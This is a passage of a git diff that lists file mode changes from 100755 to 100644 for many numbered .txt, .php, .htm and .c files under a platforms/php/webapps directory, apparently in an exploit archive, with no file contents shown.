b/platforms/php/webapps/8025.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8026.txt b/platforms/php/webapps/8026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8027.txt b/platforms/php/webapps/8027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8029.txt b/platforms/php/webapps/8029.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8030.txt b/platforms/php/webapps/8030.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8031.pph b/platforms/php/webapps/8031.pph old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8032.txt b/platforms/php/webapps/8032.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8033.txt b/platforms/php/webapps/8033.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8034.txt b/platforms/php/webapps/8034.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8035.txt b/platforms/php/webapps/8035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8039.txt b/platforms/php/webapps/8039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8040.txt b/platforms/php/webapps/8040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8042.txt b/platforms/php/webapps/8042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8044.txt b/platforms/php/webapps/8044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8046.txt b/platforms/php/webapps/8046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8047.txt b/platforms/php/webapps/8047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8049.txt b/platforms/php/webapps/8049.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8050.txt b/platforms/php/webapps/8050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8057.txt b/platforms/php/webapps/8057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8060.php b/platforms/php/webapps/8060.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8062.txt b/platforms/php/webapps/8062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8063.txt b/platforms/php/webapps/8063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8066.txt b/platforms/php/webapps/8066.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8068.txt b/platforms/php/webapps/8068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8069.txt b/platforms/php/webapps/8069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/807.txt b/platforms/php/webapps/807.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8071.txt b/platforms/php/webapps/8071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8072.txt b/platforms/php/webapps/8072.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8073.txt b/platforms/php/webapps/8073.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8076.txt b/platforms/php/webapps/8076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/808.txt b/platforms/php/webapps/808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8083.txt b/platforms/php/webapps/8083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8088.txt b/platforms/php/webapps/8088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/809.txt b/platforms/php/webapps/809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8092.txt b/platforms/php/webapps/8092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8098.txt b/platforms/php/webapps/8098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8101.txt b/platforms/php/webapps/8101.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8104.txt b/platforms/php/webapps/8104.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8105.txt b/platforms/php/webapps/8105.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8112.txt b/platforms/php/webapps/8112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8114.txt b/platforms/php/webapps/8114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8116.txt b/platforms/php/webapps/8116.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8123.txt b/platforms/php/webapps/8123.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8124.txt b/platforms/php/webapps/8124.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8127.txt b/platforms/php/webapps/8127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8128.txt b/platforms/php/webapps/8128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8133.txt b/platforms/php/webapps/8133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8134.php b/platforms/php/webapps/8134.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8136.txt b/platforms/php/webapps/8136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8139.txt b/platforms/php/webapps/8139.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/814.txt b/platforms/php/webapps/814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8140.txt b/platforms/php/webapps/8140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8141.txt b/platforms/php/webapps/8141.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8145.txt b/platforms/php/webapps/8145.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8150.txt b/platforms/php/webapps/8150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8151.txt b/platforms/php/webapps/8151.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8161.txt b/platforms/php/webapps/8161.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8164.php b/platforms/php/webapps/8164.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8165.txt b/platforms/php/webapps/8165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8166.txt b/platforms/php/webapps/8166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8167.txt b/platforms/php/webapps/8167.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8168.txt b/platforms/php/webapps/8168.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8170.txt b/platforms/php/webapps/8170.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8172.txt b/platforms/php/webapps/8172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/818.txt b/platforms/php/webapps/818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8181.c b/platforms/php/webapps/8181.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8182.txt b/platforms/php/webapps/8182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8183.txt b/platforms/php/webapps/8183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8184.txt b/platforms/php/webapps/8184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8185.txt b/platforms/php/webapps/8185.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8186.txt b/platforms/php/webapps/8186.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8188.txt b/platforms/php/webapps/8188.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8194.txt b/platforms/php/webapps/8194.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8195.txt b/platforms/php/webapps/8195.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8196.txt b/platforms/php/webapps/8196.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8197.txt b/platforms/php/webapps/8197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/820.php b/platforms/php/webapps/820.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8202.htm b/platforms/php/webapps/8202.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8204.txt b/platforms/php/webapps/8204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8207.txt b/platforms/php/webapps/8207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8209.txt b/platforms/php/webapps/8209.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8210.txt b/platforms/php/webapps/8210.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8216.txt b/platforms/php/webapps/8216.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8217.txt b/platforms/php/webapps/8217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8220.txt b/platforms/php/webapps/8220.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8226.txt b/platforms/php/webapps/8226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8228.txt b/platforms/php/webapps/8228.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8229.txt b/platforms/php/webapps/8229.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8230.txt b/platforms/php/webapps/8230.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8237.txt b/platforms/php/webapps/8237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8238.txt b/platforms/php/webapps/8238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8239.txt b/platforms/php/webapps/8239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8240.txt b/platforms/php/webapps/8240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8243.txt b/platforms/php/webapps/8243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8244.txt b/platforms/php/webapps/8244.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8252.txt b/platforms/php/webapps/8252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8255.txt b/platforms/php/webapps/8255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8268.php b/platforms/php/webapps/8268.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8271.php b/platforms/php/webapps/8271.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8277.txt b/platforms/php/webapps/8277.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8278.txt b/platforms/php/webapps/8278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8279.txt b/platforms/php/webapps/8279.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8282.txt b/platforms/php/webapps/8282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8287.php b/platforms/php/webapps/8287.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8288.txt b/platforms/php/webapps/8288.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8290.txt b/platforms/php/webapps/8290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8291.txt b/platforms/php/webapps/8291.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8292.txt b/platforms/php/webapps/8292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8293.txt b/platforms/php/webapps/8293.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8296.txt b/platforms/php/webapps/8296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8297.txt b/platforms/php/webapps/8297.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8302.php b/platforms/php/webapps/8302.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8304.txt b/platforms/php/webapps/8304.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8305.txt b/platforms/php/webapps/8305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8309.txt b/platforms/php/webapps/8309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8315.txt b/platforms/php/webapps/8315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8318.txt b/platforms/php/webapps/8318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8319.txt b/platforms/php/webapps/8319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/832.txt b/platforms/php/webapps/832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8323.txt b/platforms/php/webapps/8323.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8324.php b/platforms/php/webapps/8324.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8327.txt b/platforms/php/webapps/8327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8328.txt b/platforms/php/webapps/8328.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8329.txt b/platforms/php/webapps/8329.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8330.txt b/platforms/php/webapps/8330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8331.txt b/platforms/php/webapps/8331.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8334.txt b/platforms/php/webapps/8334.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8341.txt b/platforms/php/webapps/8341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8342.txt b/platforms/php/webapps/8342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8346.txt b/platforms/php/webapps/8346.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8347.php b/platforms/php/webapps/8347.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8348.txt b/platforms/php/webapps/8348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8349.c b/platforms/php/webapps/8349.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8350.txt b/platforms/php/webapps/8350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8353.txt b/platforms/php/webapps/8353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8355.txt b/platforms/php/webapps/8355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8361.txt b/platforms/php/webapps/8361.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8362.php b/platforms/php/webapps/8362.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8364.txt b/platforms/php/webapps/8364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8365.txt b/platforms/php/webapps/8365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8366.txt b/platforms/php/webapps/8366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8367.txt b/platforms/php/webapps/8367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8372.txt b/platforms/php/webapps/8372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8373.txt b/platforms/php/webapps/8373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8374.txt b/platforms/php/webapps/8374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8376.php b/platforms/php/webapps/8376.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8380.txt b/platforms/php/webapps/8380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8382.txt b/platforms/php/webapps/8382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8383.txt b/platforms/php/webapps/8383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8385.txt b/platforms/php/webapps/8385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8386.txt b/platforms/php/webapps/8386.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8387.txt b/platforms/php/webapps/8387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8388.txt b/platforms/php/webapps/8388.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8389.txt b/platforms/php/webapps/8389.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8394.txt b/platforms/php/webapps/8394.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8395.txt b/platforms/php/webapps/8395.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8408.txt b/platforms/php/webapps/8408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8409.txt b/platforms/php/webapps/8409.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8414.txt b/platforms/php/webapps/8414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8415.txt b/platforms/php/webapps/8415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8417.txt b/platforms/php/webapps/8417.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8423.txt b/platforms/php/webapps/8423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8424.txt b/platforms/php/webapps/8424.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8425.txt b/platforms/php/webapps/8425.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8431.txt b/platforms/php/webapps/8431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8432.txt b/platforms/php/webapps/8432.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8433.txt b/platforms/php/webapps/8433.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8435.txt b/platforms/php/webapps/8435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8436.txt b/platforms/php/webapps/8436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8437.txt b/platforms/php/webapps/8437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8438.txt b/platforms/php/webapps/8438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8439.txt b/platforms/php/webapps/8439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8440.txt b/platforms/php/webapps/8440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8441.txt b/platforms/php/webapps/8441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8442.txt b/platforms/php/webapps/8442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8443.txt b/platforms/php/webapps/8443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8446.txt b/platforms/php/webapps/8446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8448.php b/platforms/php/webapps/8448.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8449.txt b/platforms/php/webapps/8449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8450.txt b/platforms/php/webapps/8450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8453.txt b/platforms/php/webapps/8453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8454.txt b/platforms/php/webapps/8454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8455.txt b/platforms/php/webapps/8455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8457.txt b/platforms/php/webapps/8457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8459.htm b/platforms/php/webapps/8459.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8460.txt b/platforms/php/webapps/8460.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8461.txt b/platforms/php/webapps/8461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8464.txt b/platforms/php/webapps/8464.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8468.txt b/platforms/php/webapps/8468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8471.txt b/platforms/php/webapps/8471.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8472.txt b/platforms/php/webapps/8472.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8474.txt b/platforms/php/webapps/8474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8475.txt b/platforms/php/webapps/8475.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8476.txt b/platforms/php/webapps/8476.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8477.txt b/platforms/php/webapps/8477.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8480.txt b/platforms/php/webapps/8480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8481.txt b/platforms/php/webapps/8481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8482.txt b/platforms/php/webapps/8482.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8483.txt b/platforms/php/webapps/8483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8486.txt b/platforms/php/webapps/8486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8487.txt b/platforms/php/webapps/8487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8492.txt b/platforms/php/webapps/8492.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8493.txt b/platforms/php/webapps/8493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8494.txt b/platforms/php/webapps/8494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8496.htm b/platforms/php/webapps/8496.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8497.txt b/platforms/php/webapps/8497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8498.txt b/platforms/php/webapps/8498.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8499.php b/platforms/php/webapps/8499.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8501.txt b/platforms/php/webapps/8501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8502.txt b/platforms/php/webapps/8502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8503.txt b/platforms/php/webapps/8503.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8504.txt b/platforms/php/webapps/8504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8505.txt b/platforms/php/webapps/8505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8506.txt b/platforms/php/webapps/8506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8508.txt b/platforms/php/webapps/8508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8509.txt b/platforms/php/webapps/8509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8510.txt b/platforms/php/webapps/8510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8514.txt b/platforms/php/webapps/8514.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8515.txt b/platforms/php/webapps/8515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8516.txt b/platforms/php/webapps/8516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8517.txt b/platforms/php/webapps/8517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8521.txt b/platforms/php/webapps/8521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8532.txt b/platforms/php/webapps/8532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8533.txt b/platforms/php/webapps/8533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8538.txt b/platforms/php/webapps/8538.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8539.txt b/platforms/php/webapps/8539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8543.php b/platforms/php/webapps/8543.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8545.txt b/platforms/php/webapps/8545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8546.txt b/platforms/php/webapps/8546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8547.txt b/platforms/php/webapps/8547.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8548.txt b/platforms/php/webapps/8548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8549.txt b/platforms/php/webapps/8549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8550.txt b/platforms/php/webapps/8550.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8551.txt b/platforms/php/webapps/8551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8552.txt b/platforms/php/webapps/8552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8553.htm b/platforms/php/webapps/8553.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8555.txt b/platforms/php/webapps/8555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8557.htm b/platforms/php/webapps/8557.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8558.txt b/platforms/php/webapps/8558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8559.c b/platforms/php/webapps/8559.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8563.txt b/platforms/php/webapps/8563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8565.txt b/platforms/php/webapps/8565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8566.txt b/platforms/php/webapps/8566.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8567.txt b/platforms/php/webapps/8567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/857.txt b/platforms/php/webapps/857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8571.txt b/platforms/php/webapps/8571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8577.txt b/platforms/php/webapps/8577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/858.txt b/platforms/php/webapps/858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8585.txt b/platforms/php/webapps/8585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8586.txt b/platforms/php/webapps/8586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8587.htm b/platforms/php/webapps/8587.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8593.txt b/platforms/php/webapps/8593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8599.txt b/platforms/php/webapps/8599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/860.c b/platforms/php/webapps/860.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8600.txt b/platforms/php/webapps/8600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8602.txt b/platforms/php/webapps/8602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8603.php b/platforms/php/webapps/8603.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8604.txt b/platforms/php/webapps/8604.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8605.txt b/platforms/php/webapps/8605.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8608.txt b/platforms/php/webapps/8608.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8615.txt b/platforms/php/webapps/8615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8618.txt b/platforms/php/webapps/8618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8619.txt b/platforms/php/webapps/8619.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8626.txt b/platforms/php/webapps/8626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8635.txt b/platforms/php/webapps/8635.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8636.txt b/platforms/php/webapps/8636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8638.htm b/platforms/php/webapps/8638.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8639.htm b/platforms/php/webapps/8639.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/864.txt b/platforms/php/webapps/864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8642.txt b/platforms/php/webapps/8642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8643.txt b/platforms/php/webapps/8643.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8645.txt b/platforms/php/webapps/8645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8647.txt b/platforms/php/webapps/8647.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8649.php b/platforms/php/webapps/8649.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/865.txt b/platforms/php/webapps/865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8653.txt b/platforms/php/webapps/8653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8654.txt b/platforms/php/webapps/8654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8658.txt b/platforms/php/webapps/8658.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8659.php b/platforms/php/webapps/8659.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/866.c b/platforms/php/webapps/866.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8667.txt b/platforms/php/webapps/8667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8668.txt b/platforms/php/webapps/8668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8672.php b/platforms/php/webapps/8672.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8674.txt b/platforms/php/webapps/8674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8675.txt b/platforms/php/webapps/8675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8676.txt b/platforms/php/webapps/8676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8679.txt b/platforms/php/webapps/8679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8680.txt b/platforms/php/webapps/8680.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8681.php b/platforms/php/webapps/8681.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8682.txt b/platforms/php/webapps/8682.txt old mode 100755 new mode 100644 diff --git 